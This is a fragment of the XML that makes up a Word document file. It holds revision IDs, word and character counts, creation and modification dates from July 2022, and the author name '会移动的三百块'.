            <wp:docPr id="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0"/>
    <w:bookmarkEnd w:id="6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YjY5NjYxM2Y0ZWE5MGRmMzQ5M2Q2MTAzODQwYzlkNTIifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="2D5E4415"/>
    <w:rsid w:val="4118367A"/>
    <w:rsid w:val="759B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1479</Words>
  <Characters>3931</Characters>
  <Lines>12</Lines>
  <Paragraphs>8</Paragraphs>
  <TotalTime>7</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>4636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2022-07-21T09:57:00Z</dcterms:created>
  <dc:creator>会移动的三百块</dc:creator>
  <cp:lastModifiedBy>会移动的三百块</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-22T01:52:07Z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4945D8A0B48E43DA970626E8162E31ED</vt:lpwstr>
  </property>
</Properties>
</file>